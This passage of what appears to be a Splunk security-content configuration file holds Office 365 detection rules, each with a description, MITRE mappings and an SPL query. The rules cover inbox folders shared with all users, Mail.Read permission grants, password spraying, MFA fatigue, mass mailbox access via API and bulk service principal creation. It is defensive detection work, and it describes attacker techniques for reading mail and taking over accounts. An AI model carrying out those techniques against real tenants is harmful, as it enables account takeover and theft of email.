with all users within the tenant. Sharing the inbox folder with all users is an unusual and risky configuration. Attackers have been known to exploit this setting to surreptitiously read a target user's emails from another account. Such unauthorized access can lead to data breaches, leakage of confidential information, or further compromise based on the information gathered from the emails. Monitoring for this configuration change ensures that inadvertent or malicious sharing is promptly identified and addressed. If an attacker successfully configures the inbox to be shared with all users, they can access and read all emails in the affected mailbox from any account within the tenant. This can lead to data exfiltration, spear-phishing attacks based on the information in the emails, or further malicious activities using sensitive information gathered from the mailbox. action.notable.param.rule_title = O365 Mailbox Inbox Folder Shared with All Users action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation=ModifyFolderPermissions Workload=Exchange object=Inbox Item.ParentFolder.MemberUpn=Everyone | eval isReadRole=if(match('Item.ParentFolder.MemberRights', "(ReadAny)"), "true", "false") | search isReadRole = "true" | stats count earliest(_time) as firstTime latest(_time) as lastTime by Operation, UserId, object, MailboxOwnerUPN, Item.ParentFolder.MemberUpn, Item.ParentFolder.MemberRights | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_mailbox_inbox_folder_shared_with_all_users_filter` [ESCU - O365 Mailbox Read Access Granted to Application - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where the Mail.Read Graph API permissions are granted to an application registration within an Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in application permissions within the AzureActiveDirectory workload. The Mail.Read permission allows applications to access and read all emails within a user's mailbox. Emails often contain sensitive or confidential information, and unauthorized access can lead to data breaches or leakage. Monitoring the assignment of this permission ensures that only legitimate applications have such access and that any inadvertent or malicious assignments are promptly identified. If an attacker successfully grants this permission to a malicious or compromised application, they can read all emails in the affected mailboxes. This can lead to data exfiltration, spear-phishing attacks, or further compromise based on the information gathered from the emails. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1114.002", "T1114", "T1098", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where the Mail.Read Graph API permissions are granted to an application registration within an Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in application permissions within the AzureActiveDirectory workload. The Mail.Read permission allows applications to access and read all emails within a user's mailbox. Emails often contain sensitive or confidential information, and unauthorized access can lead to data breaches or leakage. Monitoring the assignment of this permission ensures that only legitimate applications have such access and that any inadvertent or malicious assignments are promptly identified. If an attacker successfully grants this permission to a malicious or compromised application, they can read all emails in the affected mailboxes. This can lead to data exfiltration, spear-phishing attacks, or further compromise based on the information gathered from the emails. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = There are legitimate scenarios in wich an Application registrations requires Mailbox read access. Filter as needed. action.escu.creation_date = 2023-09-01 action.escu.modification_date = 2023-09-01 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Mailbox Read Access Granted to Application - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = Application registration $object$ was grandes mailbox read access by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Mailbox Read Access Granted to Application - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1114.002", "T1114", "T1098", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where the Mail.Read Graph API permissions are granted to an application registration within an Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in application permissions within the AzureActiveDirectory workload. The Mail.Read permission allows applications to access and read all emails within a user's mailbox. Emails often contain sensitive or confidential information, and unauthorized access can lead to data breaches or leakage. Monitoring the assignment of this permission ensures that only legitimate applications have such access and that any inadvertent or malicious assignments are promptly identified. If an attacker successfully grants this permission to a malicious or compromised application, they can read all emails in the affected mailboxes. This can lead to data exfiltration, spear-phishing attacks, or further compromise based on the information gathered from the emails. action.notable.param.rule_title = O365 Mailbox Read Access Granted to Application action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation="Update application." | eval json_data=mvindex('ModifiedProperties{}.NewValue', 0) | eval json_data=replace(json_data, "^\[\s*", "") | eval json_data=replace(json_data, "\s*\]$", "") | spath input=json_data path=RequiredAppPermissions{}.EntitlementId output=EntitlementIds | eval match_found=mvfind(EntitlementIds, "810c84a8-4a9e-49e6-bf7d-12d183f40d01") | where isnotnull(match_found) | stats max(_time) as lastTime values(EntitlementIds) as EntitlementIds by Operation, user, object | `security_content_ctime(lastTime)` | `o365_mailbox_read_access_granted_to_application_filter` [ESCU - O365 Multi-Source Failed Authentications Spike - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects potential distributed password spraying attacks within an Office 365 environment. It identifies a significant increase in failed authentication attempts characterized by diverse user-and-IP address combinations, originating from multiple source IP addresses, and utilizing various user agents. These patterns may indicate an adversary's attempt to circumvent security controls by employing a spectrum of IP addresses to test commonly used passwords against a wide range of user accounts. The detection examines UserLoginFailed events from O365 Management Activity logs, with a particular focus on events with ErrorNumber 50126, which indicates a failed authentication due to incorrect credentials. By aggregating data over a five-minute interval, the analytic calculates the distinct counts of user-and-IP combinations and unique users and source IPs. It then applies a set of thresholds to these metrics to identify abnormal activities that could suggest a coordinated attack. The predefined thresholds within the analytic (such as unique IPs, unique users, etc.) serve as initial benchmarks and should be tailored to align with the organization's typical user behavior and risk tolerance. Early detection of such distributed activities is crucial for security operations centers (SOCs) to intercept unauthorized access attempts, avert account takeovers, and reduce the risk of subsequent malevolent actions within the organization's systems. A true positive alert from this analytic would indicate an ongoing distributed password spraying campaign targeting the organization's Office 365 tenant. If such an attack is successful, it could lead to unauthorized access, especially to accounts with administrative privileges, resulting in data breaches, privilege escalation, persistent threats, and lateral movement within the organization's digital environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects potential distributed password spraying attacks within an Office 365 environment. It identifies a significant increase in failed authentication attempts characterized by diverse user-and-IP address combinations, originating from multiple source IP addresses, and utilizing various user agents. These patterns may indicate an adversary's attempt to circumvent security controls by employing a spectrum of IP addresses to test commonly used passwords against a wide range of user accounts. The detection examines UserLoginFailed events from O365 Management Activity logs, with a particular focus on events with ErrorNumber 50126, which indicates a failed authentication due to incorrect credentials. By aggregating data over a five-minute interval, the analytic calculates the distinct counts of user-and-IP combinations and unique users and source IPs. It then applies a set of thresholds to these metrics to identify abnormal activities that could suggest a coordinated attack. The predefined thresholds within the analytic (such as unique IPs, unique users, etc.) serve as initial benchmarks and should be tailored to align with the organization's typical user behavior and risk tolerance. Early detection of such distributed activities is crucial for security operations centers (SOCs) to intercept unauthorized access attempts, avert account takeovers, and reduce the risk of subsequent malevolent actions within the organization's systems. A true positive alert from this analytic would indicate an ongoing distributed password spraying campaign targeting the organization's Office 365 tenant. If such an attack is successful, it could lead to unauthorized access, especially to accounts with administrative privileges, resulting in data breaches, privilege escalation, persistent threats, and lateral movement within the organization's digital environment. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. The thresholds set within the analytic (such as unique IPs, unique users, etc.) are initial guidelines and should be customized based on the organization's user behavior and risk profile. Security teams are encouraged to adjust these thresholds to optimize the balance between detecting genuine threats and minimizing false positives, ensuring the detection is tailored to their specific environment. action.escu.known_false_positives = This detection may yield false positives in scenarios where legitimate bulk sign-in activities occur, such as during company-wide system updates or when users are accessing resources from varying locations in a short time frame, such as in the case of VPNs or cloud services that rotate IP addresses. Filter as needed. action.escu.creation_date = 2023-11-09 action.escu.modification_date = 2023-11-09 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Multi-Source Failed Authentications Spike - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover", "NOBELIUM Group"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Multi-Source Failed Authentications Spike - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation=UserLoginFailed ErrorNumber=50126 | bucket span=5m _time | eval uniqueIPUserCombo = src_ip . "-" . user | stats dc(uniqueIPUserCombo) as uniqueIpUserCombinations, dc(user) as uniqueUsers, dc(src_ip) as uniqueIPs, values(user) as user, values(src_ip) as ips, values(user_agent) as user_agents by _time | where uniqueIpUserCombinations > 20 AND uniqueUsers > 20 AND uniqueIPs > 20 | `o365_multi_source_failed_authentications_spike_filter` [ESCU - O365 Multiple AppIDs and UserAgents Authentication Spike - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is crafted to identify unusual and potentially malicious authentication activity within an O365 environment. It triggers when a single user account is involved in more than 8 authentication attempts, using 3 or more unique application IDs and more than 5 unique user agents within a short timeframe. This pattern is atypical for regular user behavior and may indicate an adversary's attempt to probe the environment, testing for multi-factor authentication requirements across different applications and platforms. The detection is based on analysis of O365 audit logs, specifically focusing on authentication events. It employs statistical thresholds to highlight instances where the volume of authentication attempts and the diversity of application IDs and user agents associated with a single user account exceed normal parameters. Identifying this behavior is crucial as it provides an early indication of potential account compromise. Adversaries, once in possession of user credentials, often conduct reconnaissance to understand the security controls in place, including multi-factor authentication configurations. Tools like Invoke-MFASweep are commonly used for this purpose, automating the process of testing different user agents and application IDs to bypass MFA. By detecting these initial probing attempts, security teams can swiftly respond, potentially stopping an attack in its early stages and preventing further unauthorized access. This proactive stance is vital for maintaining the integrity of the organization's security posture. If validated as a true positive, this detection points to a compromised account, signaling that an attacker is actively attempting to navigate security controls to maintain access and potentially escalate privileges. This could lead to further exploitation, lateral movement within the network, and eventual data exfiltration. Recognizing and responding to this early stage of an attack is vital for preventing substantial harm and safeguarding sensitive organizational data and systems. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is crafted to identify unusual and potentially malicious authentication activity within an O365 environment. It triggers when a single user account is involved in more than 8 authentication attempts, using 3 or more unique application IDs and more than 5 unique user agents within a short timeframe. This pattern is atypical for regular user behavior and may indicate an adversary's attempt to probe the environment, testing for multi-factor authentication requirements across different applications and platforms. The detection is based on analysis of O365 audit logs, specifically focusing on authentication events. It employs statistical thresholds to highlight instances where the volume of authentication attempts and the diversity of application IDs and user agents associated with a single user account exceed normal parameters. Identifying this behavior is crucial as it provides an early indication of potential account compromise. Adversaries, once in possession of user credentials, often conduct reconnaissance to understand the security controls in place, including multi-factor authentication configurations. Tools like Invoke-MFASweep are commonly used for this purpose, automating the process of testing different user agents and application IDs to bypass MFA. By detecting these initial probing attempts, security teams can swiftly respond, potentially stopping an attack in its early stages and preventing further unauthorized access. This proactive stance is vital for maintaining the integrity of the organization's security posture. If validated as a true positive, this detection points to a compromised account, signaling that an attacker is actively attempting to navigate security controls to maintain access and potentially escalate privileges. This could lead to further exploitation, lateral movement within the network, and eventual data exfiltration. Recognizing and responding to this early stage of an attack is vital for preventing substantial harm and safeguarding sensitive organizational data and systems. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Rapid authentication from the same user using more than 5 different user agents and 3 application IDs is highly unlikely under normal circumstances. However, there are potential scenarios that could lead to false positives. action.escu.creation_date = 2023-10-24 action.escu.modification_date = 2023-10-24 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Multiple AppIDs and UserAgents Authentication Spike - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = $user$ authenticated in a short period of time with more than 5 different user agents across 3 or more unique application ids. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Multiple AppIDs and UserAgents Authentication Spike - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory (Operation=UserLoggedIn OR Operation=UserLoginFailed) | bucket span=5m _time | stats dc(_raw) as failed_attempts dc(ApplicationId) as unique_app_ids dc(UserAgent) as unique_user_agents values(ApplicationId) values(OS) by _time user src_ip | where failed_attempts > 5 and unique_user_agents > 5 and unique_app_ids > 2 | `o365_multiple_appids_and_useragents_authentication_spike_filter` [ESCU - O365 Multiple Failed MFA Requests For User - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies potential "MFA fatigue" attacks targeting Office 365 users. Specifically, it detects scenarios where a user experiences more than nine Multi-Factor Authentication (MFA) prompts within a 10-minute timeframe. Attackers may exploit MFA fatigue by repeatedly triggering MFA requests, hoping that the user, out of frustration or oversight, will approve a malicious authentication attempt. The detection leverages O365 management activity logs, focusing on Azure Active Directory events. It looks for the UserLoginFailed operation combined with a Success ResultStatus and an ErrorNumber of 500121, which indicates MFA prompts. By monitoring these specific events and conditions, the analytic captures and alerts on potential MFA fatigue scenarios. With MFA being a cornerstone of modern cybersecurity defenses, attackers are constantly seeking ways to bypass or exploit it. MFA fatigue is one such tactic, where attackers rely on user frustration or confusion caused by frequent MFA prompts. Detecting potential MFA fatigue scenarios allows security teams to proactively investigate and ensure that users aren't inadvertently granting access to malicious actors. If this detection flags a true positive, it suggests a potential attempt by an attacker to exploit MFA mechanisms to gain unauthorized access to an O365 account. Successful exploitation could lead to data breaches, unauthorized data access, or further compromise within the O365 environment. Immediate investigation and response would be crucial to safeguard the affected account and assess the full scope of the potential breach. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies potential "MFA fatigue" attacks targeting Office 365 users. Specifically, it detects scenarios where a user experiences more than nine Multi-Factor Authentication (MFA) prompts within a 10-minute timeframe. Attackers may exploit MFA fatigue by repeatedly triggering MFA requests, hoping that the user, out of frustration or oversight, will approve a malicious authentication attempt. The detection leverages O365 management activity logs, focusing on Azure Active Directory events. It looks for the UserLoginFailed operation combined with a Success ResultStatus and an ErrorNumber of 500121, which indicates MFA prompts. By monitoring these specific events and conditions, the analytic captures and alerts on potential MFA fatigue scenarios. With MFA being a cornerstone of modern cybersecurity defenses, attackers are constantly seeking ways to bypass or exploit it. MFA fatigue is one such tactic, where attackers rely on user frustration or confusion caused by frequent MFA prompts. Detecting potential MFA fatigue scenarios allows security teams to proactively investigate and ensure that users aren't inadvertently granting access to malicious actors. If this detection flags a true positive, it suggests a potential attempt by an attacker to exploit MFA mechanisms to gain unauthorized access to an O365 account. Successful exploitation could lead to data breaches, unauthorized data access, or further compromise within the O365 environment. Immediate investigation and response would be crucial to safeguard the affected account and assess the full scope of the potential breach. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Multiple Failed MFA requests may also be a sign of authentication or application issues. Filter as needed. action.escu.creation_date = 2023-10-19 action.escu.modification_date = 2023-10-19 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Multiple Failed MFA Requests For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = Multiple failed MFA requestes for $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Multiple Failed MFA Requests For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies potential "MFA fatigue" attacks targeting Office 365 users. Specifically, it detects scenarios where a user experiences more than nine Multi-Factor Authentication (MFA) prompts within a 10-minute timeframe. Attackers may exploit MFA fatigue by repeatedly triggering MFA requests, hoping that the user, out of frustration or oversight, will approve a malicious authentication attempt. The detection leverages O365 management activity logs, focusing on Azure Active Directory events. It looks for the UserLoginFailed operation combined with a Success ResultStatus and an ErrorNumber of 500121, which indicates MFA prompts. By monitoring these specific events and conditions, the analytic captures and alerts on potential MFA fatigue scenarios. With MFA being a cornerstone of modern cybersecurity defenses, attackers are constantly seeking ways to bypass or exploit it. MFA fatigue is one such tactic, where attackers rely on user frustration or confusion caused by frequent MFA prompts. Detecting potential MFA fatigue scenarios allows security teams to proactively investigate and ensure that users aren't inadvertently granting access to malicious actors. If this detection flags a true positive, it suggests a potential attempt by an attacker to exploit MFA mechanisms to gain unauthorized access to an O365 account. Successful exploitation could lead to data breaches, unauthorized data access, or further compromise within the O365 environment. Immediate investigation and response would be crucial to safeguard the affected account and assess the full scope of the potential breach. action.notable.param.rule_title = O365 Multiple Failed MFA Requests For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation=UserLoginFailed ResultStatus=Success ErrorNumber=500121 | bucket span=10m _time | stats dc(_raw) as mfa_prompts values(LogonError) as LogonError values(signature) as signature by user, _time | where mfa_prompts > 9 | `o365_multiple_failed_mfa_requests_for_user_filter` [ESCU - O365 Multiple Mailboxes Accessed via API - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to trigger when a high number of Office 365 Exchange mailboxes are accessed via API (Microsoft Graph API or Exchange Web Services) in a short time, hinting at possible unauthorized mass email access. It tracks 'MailItemsAccessed' operations in Exchange, using AppId and regex to identify API interactions. Crucial for SOC teams, this analytic focuses on spotting abnormal access patterns, often signaling data exfiltration or account compromise. Security teams should tailor the threshold set here to flag over five unique mailboxes accessed within 10 minutes to align with their environment's norms, ensuring effective detection of potential security incidents while maintaining operational efficiency. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Web"] action.escu.eli5 = The following analytic is designed to trigger when a high number of Office 365 Exchange mailboxes are accessed via API (Microsoft Graph API or Exchange Web Services) in a short time, hinting at possible unauthorized mass email access. It tracks 'MailItemsAccessed' operations in Exchange, using AppId and regex to identify API interactions. Crucial for SOC teams, this analytic focuses on spotting abnormal access patterns, often signaling data exfiltration or account compromise. Security teams should tailor the threshold set here to flag over five unique mailboxes accessed within 10 minutes to align with their environment's norms, ensuring effective detection of potential security incidents while maintaining operational efficiency. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Legitimate applications may access multiple mailboxes via an API. You can filter by the ClientAppId or the CLientIpAddress fields. action.escu.creation_date = 2024-02-01 action.escu.modification_date = 2024-02-01 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Multiple Mailboxes Accessed via API - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = An Oauth application identified with id $ClientAppId$ accessed multiple mailboxes in a short period of time via an API. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Multiple Mailboxes Accessed via API - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is designed to trigger when a high number of Office 365 Exchange mailboxes are accessed via API (Microsoft Graph API or Exchange Web Services) in a short time, hinting at possible unauthorized mass email access. It tracks 'MailItemsAccessed' operations in Exchange, using AppId and regex to identify API interactions. Crucial for SOC teams, this analytic focuses on spotting abnormal access patterns, often signaling data exfiltration or account compromise. Security teams should tailor the threshold set here to flag over five unique mailboxes accessed within 10 minutes to align with their environment's norms, ensuring effective detection of potential security incidents while maintaining operational efficiency. action.notable.param.rule_title = O365 Multiple Mailboxes Accessed via API action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=Exchange Operation=MailItemsAccessed AppId=* ClientAppId=* | bucket span=10m _time | eval matchRegex=if(match(ClientInfoString, "^Client=WebServices;ExchangeWebServices"), 1, 0) | search (AppId="00000003-0000-0000-c000-000000000000" OR matchRegex=1) | stats values(ClientIPAddress) as src_ip dc(user) as unique_mailboxes values(user) as user by _time ClientAppId ClientInfoString | where unique_mailboxes > 5 | `o365_multiple_mailboxes_accessed_via_api_filter` [ESCU - O365 Multiple Service Principals Created by SP - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection aims to identify instances where a single service principal creates more than three unique OAuth applications within a 10-minute timeframe, using O365 logs from the Unified Audit Log. The focus is on tracking the 'Add service principal' operation within the Office 365 Azure Active Directory environment. The query effectively buckets events in 10-minute intervals, specifically scrutinizing the actions of service principals. By quantifying the number of distinct OAuth applications each service principal establishes, the analytic provides critical insights for SOC teams into potentially anomalous or malicious activities. These activities could include a compromised or malicious service principal being used to create multiple service principals, which might be indicative of an attempt to expand control or access within the network. Security teams are advised to adapt the threshold of three applications to align with their typical operational baseline action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection aims to identify instances where a single service principal creates more than three unique OAuth applications within a 10-minute timeframe, using O365 logs from the Unified Audit Log. The focus is on tracking the 'Add service principal' operation within the Office 365 Azure Active Directory environment. The query effectively buckets events in 10-minute intervals, specifically scrutinizing the actions of service principals. By quantifying the number of distinct OAuth applications each service principal establishes, the analytic provides critical insights for SOC teams into potentially anomalous or malicious activities. These activities could include a compromised or malicious service principal being used to create multiple service principals, which might be indicative of an attempt to expand control or access within the network. Security teams are advised to adapt the threshold of three applications to align with their typical operational baseline action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Certain users or applications may create multiple service principals in a short period of time for legitimate purposes. Filter as needed. action.escu.creation_date = 2024-02-07 action.escu.modification_date = 2024-02-07 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Multiple Service Principals Created by SP - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = Multiple OAuth applications were created by $src_user$ in a short period of time action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "other", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Multiple Service Principals Created by SP - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Add service principal." | bucket span=10m _time | eval len=mvcount('Actor{}.ID') | eval userType = mvindex('Actor{}.ID',len-1) | search userType = "ServicePrincipal" | eval displayName = object | stats count earliest(_time) as firstTime latest(_time) as lastTime values(displayName) as displayName dc(displayName) as unique_apps by src_user | where unique_apps > 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_multiple_service_principals_created_by_sp_filter` [ESCU - O365 Multiple Service Principals Created by User - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection is tailored to spot occurrences where a single user, rather than a service principal, creates more than three unique OAuth applications within a 10-minute window in the Office 365 environment. Utilizing O365 logs from the Unified Audit Log, it focuses on the 'Add service principal' operation in Azure Active Directory. The query segments events into 10-minute intervals, exclusively monitoring user activities. It calculates the number of distinct OAuth applications initiated by each user, providing SOC teams with essential data for identifying potential security threats. Such activity could suggest that a user account is either compromised or engaged in unauthorized activities, potentially setting the stage for broader network infiltration or privilege escalation. It's important for security teams to adjust the threshold of three applications to fit their operational context. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection is tailored to spot occurrences where a single user, rather than a service principal, creates more than three unique OAuth applications within a 10-minute window in the Office 365 environment. Utilizing O365 logs from the Unified Audit Log, it focuses on the 'Add service principal' operation in Azure Active Directory. The query segments events into 10-minute intervals, exclusively monitoring user activities. It calculates the number of distinct OAuth applications initiated by each user, providing SOC teams with essential data for identifying potential security threats. Such activity could suggest that a user account is either compromised or engaged in unauthorized activities, potentially setting the stage for broader network infiltration or privilege escalation. It's important for security teams to adjust the threshold of three applications to fit their operational context. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Certain users or applications may create multiple service principals in a short period of time for legitimate purposes. Filter as needed. action.escu.creation_date = 2024-02-07 action.escu.modification_date = 2024-02-07 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Multiple Service Principals Created by User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = Multiple OAuth applications were created by $src_user$ in a short period of time action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "other", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Multiple Service Principals Created by User - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` 